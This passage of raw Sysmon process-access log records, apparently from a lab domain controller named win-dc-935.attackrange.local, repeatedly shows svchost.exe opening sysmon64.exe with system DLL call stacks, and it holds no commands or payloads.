13:53:21.695{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001650Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.695{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001649Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.695{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001648Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.695{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001647Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.695{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001646Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.694{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001645Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.694{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001644Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.694{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001643Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.694{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001642Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.688{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001641Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.688{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001640Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.688{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001639Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.688{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001638Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.688{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001637Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.688{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001636Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.687{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001635Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.687{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001634Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.687{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001633Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.686{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001632Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.686{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001631Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.686{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001630Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.686{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001629Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001628Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.685{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001627Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 